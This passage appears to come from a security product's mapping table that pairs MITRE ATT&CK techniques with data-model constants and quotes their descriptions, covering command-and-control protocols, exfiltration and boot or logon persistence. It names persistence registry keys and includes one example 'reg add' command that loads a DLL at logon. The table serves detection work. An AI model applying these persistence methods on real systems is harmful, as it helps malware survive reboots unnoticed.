will be embedded within the protocol traffic between the client and server. Adversaries may utilize many
different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For
connections that occur internally within an enclave (such as those between a proxy or pivot node and other
nodes), commonly used protocols are SMB, SSH, or RDP. https://attack.mitre.org/techniques/T1071

T1071.004 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_DNS Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid
detection/network filtering by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic between the client and server.
The DNS protocol serves an administrative function in computer networking and thus may be very common
in environments. DNS traffic may also be allowed even before network authentication is completed. DNS
packets contain many fields and headers in which data can be concealed. Often known as DNS tunneling,
adversaries may abuse DNS to communicate with systems under their control within a victim network while
also mimicking normal, expected traffic.(Citation: PAN DNS Tunneling)(Citation: Medium DnsTunneling)
https://attack.mitre.org/techniques/T1071/004
Original Mapped Description

T1071.002 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_FILE_TRANSFER_PROTOCOLS Adversaries may communicate using application layer protocols associated with transferring files to avoid
detection/network filtering by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as FTP, FTPS, and TFTP that transfer files may be very common in environments. Packets
produced from these protocols may have many fields and headers in which data can be concealed. Data
could also be concealed within the transferred files. An adversary may abuse these protocols to
communicate with systems under their control within a victim network while also mimicking normal,
expected traffic. https://attack.mitre.org/techniques/T1071/002

T1071.003 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_MAIL_PROTOCOLS Adversaries may communicate using application layer protocols associated with electronic mail delivery to
avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and
often the results of those commands, will be embedded within the protocol traffic between the client and
server. Protocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in
environments. Packets produced from these protocols may have many fields and headers in which data
can be concealed. Data could also be concealed within the email messages themselves. An adversary may
abuse these protocols to communicate with systems under their control within a victim network while also
mimicking normal, expected traffic. https://attack.mitre.org/techniques/T1071/003

T1071.001 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_LAYER_PROTOCOL_WEB_PROTOCOLS Adversaries may communicate using application layer protocols associated with web traffic to avoid
detection/network filtering by blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic between the client and server.
Protocols such as HTTP and HTTPS that carry web traffic may be very common in environments. HTTP/S
packets have many fields and headers in which data can be concealed. An adversary may abuse these
protocols to communicate with systems under their control within a victim network while also mimicking
normal, expected traffic. https://attack.mitre.org/techniques/T1071/001

T1010 XDM_CONST.MITRE_TECHNIQUE_APPLICATION_WINDOW_DISCOVERY Adversaries may attempt to get a listing of open application windows. Window listings could convey
information about how the system is used or give context to information collected by a keylogger. https://
attack.mitre.org/techniques/T1010

T1560 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data
can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption
can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous
upon inspection by a defender. Both compression and encryption are done prior to exfiltration, and can be
performed using a utility, 3rd party library, or custom method. https://attack.mitre.org/techniques/T1560

T1560.003 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA_ARCHIVE_VIA_CUSTOM_METHOD An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method.
Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers
implemented with no external library or utility references. Custom implementations of well-known
compression algorithms have also been used.(Citation: ESET Sednit Part 2) https://attack.mitre.org/
techniques/T1560/003

T1560.002 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA_ARCHIVE_VIA_LIBRARY An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries.
Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006)
rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include
functionality to encrypt and/or compress data. Some archival libraries are preinstalled on systems, such as
bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The
libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar
execution mechanism. https://attack.mitre.org/techniques/T1560/002

T1560.001 XDM_CONST.MITRE_TECHNIQUE_ARCHIVE_COLLECTED_DATA_ARCHIVE_VIA_UTILITY An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities.
Many utilities exist that can archive data, including 7-Zip(Citation: 7zip Homepage), WinRAR(Citation:
WinRAR Homepage), and WinZip(Citation: WinZip Homepage). Most utilities include functionality to encrypt
and/or compress data. Some 3rd party utilities may be preinstalled, such as `tar` on Linux and macOS or
`zip` on Windows systems. https://attack.mitre.org/techniques/T1560/001

T1123 XDM_CONST.MITRE_TECHNIQUE_AUDIO_CAPTURE An adversary can leverage a computer's peripheral devices (e.g., microphones and webcams) or
applications (e.g., voice and video call services) to capture audio recordings for the purpose of listening into
sensitive conversations to gather information. Malware or scripts may be used to interact with the devices
through an available API provided by the operating system or an application to capture audio. Audio files
may be written to disk and exfiltrated later. https://attack.mitre.org/techniques/T1123

T1119 XDM_CONST.MITRE_TECHNIQUE_AUTOMATED_COLLECTION Once established within a system or network, an adversary may use automated techniques for collecting
internal data. Methods for performing this technique could include use of a [Command and Scripting
Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria
such as file type, location, or name at specific time intervals. This functionality could also be built into
remote access tools. This technique may incorporate use of other techniques such as [File and Directory
Discovery](https://attack.mitre.org/techniques/T1083) and [Lateral Tool Transfer](https://attack.mitre.org/
techniques/T1570) to identify and move files. https://attack.mitre.org/techniques/T1119

T1020 XDM_CONST.MITRE_TECHNIQUE_AUTOMATED_EXFILTRATION Adversaries may exfiltrate data, such as sensitive documents, through the use of automated processing
after being gathered during Collection. When automated exfiltration is used, other exfiltration techniques
likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel]
(https://attack.mitre.org/techniques/T1041) and [Exfiltration Over Alternative Protocol](https://
attack.mitre.org/techniques/T1048). https://attack.mitre.org/techniques/T1020

T1020.001 XDM_CONST.MITRE_TECHNIQUE_AUTOMATED_EXFILTRATION_TRAFFIC_DUPLICATION Adversaries may leverage traffic mirroring in order to automate data exfiltration over compromised network
infrastructure. Traffic mirroring is a native feature for some network devices and used for network analysis
and may be configured to duplicate traffic and forward to one or more destinations for analysis by a network
analyzer or other monitoring device. (Citation: Cisco Traffic Mirroring) (Citation: Juniper Traffic Mirroring)
Adversaries may abuse traffic mirroring to mirror or redirect network traffic through other network
infrastructure they control. Malicious modifications to network devices to enable traffic redirection may be
possible through [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) or [Patch System Image]
(https://attack.mitre.org/techniques/T1601/001).(Citation: US-CERT-TA18-106A)(Citation: Cisco Blog
Legacy Device Attacks) Adversaries may use traffic duplication in conjunction with [Network Sniffing]
(https://attack.mitre.org/techniques/T1040), [Input Capture](https://attack.mitre.org/techniques/T1056), or
[Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) depending on the goals and objectives
of the adversary. https://attack.mitre.org/techniques/T1020/001

T1197 XDM_CONST.MITRE_TECHNIQUE_BITS_JOBS Adversaries may abuse BITS jobs to persistently execute or clean up after malicious payloads. Windows
Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism
exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).
(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and
other applications preferred to operate in the background (using available idle bandwidth) without
interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a
queue of one or more file operations. The interface to create and manage BITS jobs is accessible through
[PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/
software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin) Adversaries may abuse
BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained
in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.
(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation:
Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing
jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job
completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU
BITS Malware June 2016) BITS upload functionalities can also be used to perform [Exfiltration Over
Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
https://attack.mitre.org/techniques/T1197
Original Mapped Description

T1547 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION Adversaries may configure system settings to automatically execute a program during system boot or logon
to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may
have mechanisms for automatically running a program on system boot or account logon.(Citation: Microsoft
Run Key)(Citation: MSDN Authentication Packages)(Citation: Microsoft TimeProvider)(Citation: Cylance
Reg Persistence Sept 2013)(Citation: Linux Kernel Programming) These mechanisms may include
automatically executing programs that are placed in specially designated directories or are referenced by
repositories that store configuration information, such as the Windows Registry. An adversary may achieve
the same goal by modifying or extending features of the kernel. Since some boot or logon autostart
programs run with higher privileges, an adversary may leverage these to elevate privileges. https://
attack.mitre.org/techniques/T1547

T1547.014 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_ACTIVE_SETUP Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value
stored in the Registry key will be executed after a user logs into the computer.(Citation: Klein Active Setup
2010) These programs will be executed under the context of the user and will have the account's
associated permissions level. Adversaries may abuse Active Setup by creating a key under
HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\ and setting a malicious value for
StubPath. This value will serve as the program that will be executed when a user logs into the computer.
(Citation: Mandiant Glyer APT 2010)(Citation: Citizenlab Packrat 2015)(Citation: FireEye CFR Watering
Hole 2012)(Citation: SECURELIST Bright Star 2015)(Citation: paloalto Tropic Trooper 2016) Adversaries
can abuse these components to execute malware, such as remote access tools, to maintain persistence
through system reboots. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/
T1036) to make the Registry entries look as if they are associated with legitimate programs. https://
attack.mitre.org/techniques/T1547/014

T1547.002 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_AUTHENTICATION_PACKAGE Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows
authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start.
They provide support for multiple logon processes and multiple security protocols to the operating system.
(Citation: MSDN Authentication Packages) Adversaries can use the autostart mechanism provided by LSA
authentication packages for persistence by placing a reference to a binary in the Windows Registry location
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ with the key value of "Authentication
Packages"=<target binary>. The binary will then be executed by the system when the authentication
packages are loaded. https://attack.mitre.org/techniques/T1547/002

T1547.006 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_KERNEL_MODULES_AND_EXTENSIONS Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel
Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They
extend the functionality of the kernel without the need to reboot the system. For example, one type of
module is the device driver, which allows the kernel to access hardware connected to the system. (Citation:
Linux Kernel Programming) When used maliciously, LKMs can be a type of kernel-mode [Rootkit](https://
attack.mitre.org/techniques/T1014) that run with the highest operating system privilege (Ring 0). (Citation:
Linux Kernel Module Programming Guide) Common features of LKM based rootkits include: hiding itself,
selective hiding of files, processes and network activity, as well as log tampering, providing authenticated
backdoors and enabling root access to non-privileged users. (Citation: iDefense Rootkit Overview) Kernel
extensions, also called kext, are used for macOS to load functionality onto a system similar to LKMs for
Linux. They are loaded and unloaded through kextload and kextunload commands. Since macOS
Catalina 10.15, kernel extensions have been deprecated on macOS systems.(Citation: Apple Kernel
Extension Deprecation) Adversaries can use LKMs and kexts to covertly persist on a system and elevate
privileges. Examples have been found in the wild and there are some open source projects. (Citation:
Volatility Phalanx2) (Citation: CrowdStrike Linux Rootkit) (Citation: GitHub Reptile) (Citation: GitHub
Diamorphine)(Citation: RSAC 2015 San Francisco Patrick Wardle) (Citation: Synack Secure Kernel
Extension Broken)(Citation: Securelist Ventir) (Citation: Trend Micro Skidmap) https://attack.mitre.org/
techniques/T1547/006

T1547.008 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_LSASS_DRIVER Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The
Windows security subsystem is a set of components that manage and enforce the security policy for a
computer or domain. The Local Security Authority (LSA) is the main component responsible for local
security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated
with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS)
lsass.exe process. (Citation: Microsoft Security Subsystem) Adversaries may target LSASS drivers to
obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://
attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute
malicious payloads. https://attack.mitre.org/techniques/T1547/008

T1547.015 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_LOGIN_ITEMS Adversaries may add login items to execute upon user login to gain persistence or escalate privileges.
Login items are applications, documents, folders, or server connections that are automatically launched
when a user logs in.(Citation: Open Login Items Apple) Login items can be added via a shared file list or
Service Management Framework.(Citation: Adding Login Items) Shared file list login items can be set using
scripting languages such as [AppleScript](https://attack.mitre.org/techniques/T1059/002), whereas the
Service Management Framework uses the API call SMLoginItemSetEnabled. Login items installed using
the Service Management Framework leverage launchd, are not visible in the System Preferences, and can
only be removed by the application that created them.(Citation: Adding Login Items)(Citation:
SMLoginItemSetEnabled Schroeder 2013) Login items created using a shared file list are visible in System
Preferences, can hide the application when it launches, and are executed through LaunchServices, not
launchd, to open applications, documents, or URLs without using Finder.(Citation: Launch Services Apple
Developer) Users and applications use login items to configure their user environment to launch commonly
used services or applications, such as email, chat, and music applications. Adversaries can utilize
[AppleScript](https://attack.mitre.org/techniques/T1059/002) and [Native API](https://attack.mitre.org/
techniques/T1106) calls to create a login item to spawn malicious executables.(Citation: ELC Running at
startup) Prior to version 10.5 on macOS, adversaries can add login items by using [AppleScript](https://
attack.mitre.org/techniques/T1059/002) to send an Apple events to the “System Events” process, which has
an AppleScript dictionary for manipulating login items.(Citation: Login Items AE) Adversaries can use a
command such as tell application “System Events” to make login item at end with
properties /path/to/executable.(Citation: Startup Items Eclectic)(Citation: hexed osx.dok analysis
2019)(Citation: Add List Remove Login Items Apple Script) This command adds the path of the malicious
executable to the login item file list located in ~/Library/Application Support/
com.apple.backgroundtaskmanagementagent/backgrounditems.btm.(Citation: Startup Items Eclectic)
Adversaries can also use login items to launch executables that can be used to control the victim system
remotely or as a means to gain privilege escalation by prompting for user credentials.(Citation: objsee mac
malware 2017)(Citation: CheckPoint Dok)(Citation: objsee netwire backdoor 2019) https://attack.mitre.org/
techniques/T1547/015

T1547.011 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PLIST_MODIFICATION Adversaries can modify property list files (plist files) to execute their code as part of establishing
persistence. Plist files are used by macOS applications to store properties and configuration settings for
applications and services. Applications use information plist files, Info.plist, to tell the operating system
how to handle the application at runtime using structured metadata in the form of keys and values. Plist files
are formatted in XML and based on Apple's Core Foundation DTD and can be saved in text or binary
format.(Citation: fileinfo plist file description) Adversaries can modify paths to executed binaries, add
command line arguments, and insert key/pair values to plist files in auto-run locations which execute upon
user logon or system startup. Through modifying plist files in these locations, adversaries can also execute
a malicious dynamic library (dylib) by adding a dictionary containing the DYLD_INSERT_LIBRARIES key
combined with a path to a malicious dylib under the EnvironmentVariables key in a plist file. Upon user
logon, the plist is called for execution and the malicious dylib is executed within the process space.
Persistence can also be achieved by modifying the LSEnvironment key in the application's Info.plist
file.(Citation: wardle artofmalware volume1) https://attack.mitre.org/techniques/T1547/011

T1547.010 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PORT_MONITORS Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or
privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at
startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the
print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level
permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a
fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.
The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor *
WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system
reboot and execute as SYSTEM. https://attack.mitre.org/techniques/T1547/010
Original Mapped Description

T1547.012 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_PRINT_PROCESSORS Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or
privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe,
during boot. Adversaries may abuse the print spooler service by adding print processors that load malicious
DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an
account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to
the print spooler service by adding the HKLM\SYSTEM\\[CurrentControlSet or
ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows
x64]\Print Processors\\[user defined]\Driver Registry key that points to the DLL. For the print
processor to be correctly installed, it must be located in the system print-processor directory that can be
found with the GetPrintProcessorDirectory API call.(Citation: Microsoft AddPrintProcessor May 2018)
After the print processors are installed, the print spooler service, which starts during boot, must be restarted
in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM
level permissions, therefore print processors installed by an adversary may run under elevated privileges.
https://attack.mitre.org/techniques/T1547/012

T1547.007 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_RE_OPENED_APPLICATIONS Adversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac
OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their
machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app
basis, there are property list files (plist) that contain this information as well located at ~/Library/
Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/
com.apple.loginwindow.* .plist. An adversary can modify one of these files directly to include a link
to their malicious executable to provide a persistence mechanism each time the user reboots their machine
(Citation: Methods of Mac Malware Persistence). https://attack.mitre.org/techniques/T1547/007

T1547.001 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_REGISTRY_RUN_KEYS_OR_STARTUP_FOLDER Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a
Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program
referenced to be executed when a user logs in. (Citation: Microsoft Run Key) These programs will be
executed under the context of the user and will have the account's associated permissions level. Placing a
program within a startup folder will also cause that program to execute when a user logs in. There is a
startup folder location for individual user accounts as well as a system-wide startup folder that will be
checked regardless of which user account logs in. The startup folder path for the current user is C:\Users\
\[Username]\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup. The startup
folder path for all users is C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp. The
following run keys are created by default on Windows systems: *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce Run keys may exist
under multiple hives.(Citation: Microsoft Wow6432Node 2018)(Citation: Malwarebytes Wow6432Node
2016) The HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx is also
available but is not created by default on Windows Vista and newer. Registry run key entries can reference
programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it
is possible to load a DLL at logon using a "Depend" key with RunOnceEx: reg add
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:
\temp\evil[.]dll" (Citation: Oddvar Moe RunOnceEx Mar 2018) The following Registry keys can be
used to set startup folder items for persistence: *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell
Folders * HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell
Folders * HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User
Shell Folders The following Registry keys can control automatic startup of services during boot: *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices Using policy
settings to specify startup programs creates corresponding values in either of two Registry keys: *
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run *
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run The
Winlogon key controls actions that occur when a user logs on to a computer running Windows 7. Most of
these actions are under the control of the operating system, but you can also add custom actions here. The
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit and
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell subkeys
can automatically launch programs. Programs listed in the load value of the registry key
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows run when any user
logs on. By default, the multistring BootExecute value of the registry key
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager is set to autocheck
autochk *. This value causes Windows, at startup, to check the file-system integrity of the hard disks if the
system has been shut down abnormally. Adversaries can add other programs or processes to this registry
value which will automatically launch at boot. Adversaries can use these configuration locations to execute
malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may
also use [Masquerading](https://attack.mitre.org/techniques/T1036) to make the Registry entries look as if
they are associated with legitimate programs. https://attack.mitre.org/techniques/T1547/001

T1547.005 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_SECURITY_SUPPORT_PROVIDER Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots.
Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once
loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in
Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is
stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages and
HKLM\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\Security Packages. An adversary may
modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when
the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014) https://attack.mitre.org/
techniques/T1547/005

T1547.009 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_SHORTCUT_MODIFICATION Adversaries may create or edit shortcuts to run a program during system boot or user login. Shortcuts or
symbolic links are ways of referencing other files or programs that will be opened or executed when the
shortcut is clicked or executed by a system startup process. Adversaries could use shortcuts to execute
their tools for persistence. They may create a new shortcut as a means of indirection that may use
[Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries
could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead
of the intended legitimate program. https://attack.mitre.org/techniques/T1547/009

T1547.003 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_TIME_PROVIDERS Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service
(W32Time) enables time synchronization across and within domains. (Citation: Microsoft W32Time Feb
2018) W32Time time providers are responsible for retrieving time stamps from hardware/network resources
and outputting these values to other network clients. (Citation: Microsoft TimeProvider) Time providers are
implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\. (Citation:
Microsoft TimeProvider) The time provider manager, directed by the service control manager, loads and
starts time providers listed and enabled under this key at system startup and/or whenever parameters are
changed. (Citation: Microsoft TimeProvider) Adversaries may abuse this architecture to establish
persistence, specifically by registering and enabling a malicious DLL as a time provider. Administrator
privileges are required for time provider registration, though execution will run in context of the Local
Service account. (Citation: Github W32Time Oct 2017) https://attack.mitre.org/techniques/T1547/003

T1547.004 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_WINLOGON_HELPER_DLL Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.
Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure
attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\
\Wow6432Node\\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional
helper programs and functionalities that support Winlogon. (Citation: Cylance Reg Persistence Sept 2013)
Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs
and/or executables. Specifically, the following subkeys have been known to be possibly vulnerable to
abuse: (Citation: Cylance Reg Persistence Sept 2013) * Winlogon\Notify - points to notification package
DLLs that handle Winlogon events * Winlogon\Userinit - points to userinit.exe, the user initialization
program executed when a user logs on * Winlogon\Shell - points to explorer.exe, the system shell executed
when a user logs on Adversaries may take advantage of these features to repeatedly execute malicious
code and establish persistence. https://attack.mitre.org/techniques/T1547/004
Original Mapped Description

T1547.013 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_AUTOSTART_EXECUTION_XDG_AUTOSTART_ENTRIES Adversaries may modify XDG autostart entries to execute programs or commands during system boot.
Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries.
These entries will allow an application to automatically start during the startup of a desktop environment
after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or
~/.config/autostart directories and have a .desktop file extension.(Citation: Free Desktop Application
Autostart Feb 2006) Within an XDG autostart entry file, the Type key specifies if the entry is an application
(type 1), link (type 2) or directory (type 3). The Name key indicates an arbitrary name assigned by the
creator and the Exec key indicates the application and command line arguments to execute.(Citation: Free
Desktop Entry Keys) Adversaries may use XDG autostart entries to maintain persistence by executing
malicious commands and payloads, such as remote access tools, during the startup of a desktop
environment. Commands included in XDG autostart entries with execute after user logon in the context of
the currently logged on user. Adversaries may also use [Masquerading](https://attack.mitre.org/techniques/
T1036) to make XDG autostart entries look as if they are associated with legitimate programs. https://
attack.mitre.org/techniques/T1547/013

T1037 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence.
Initialization scripts can be used to perform administrative functions, which may often execute other
programs or send information to an internal logging server. These scripts can vary based on operating
system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence
on a single system. Depending on the access configuration of the logon scripts, either local credentials or
an administrator account may be necessary. An adversary may also be able to escalate their privileges
since some boot or logon initialization scripts run with higher privileges. https://attack.mitre.org/techniques/
T1037

T1037.002 XDM_CONST.MITRE_TECHNIQUE_BOOT_OR_LOGON_INITIALIZATION_SCRIPTS_LOGON_SCRIPT_MAC Adversaries may use macOS logon scripts automatically executed at logon initialization to establish
persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user
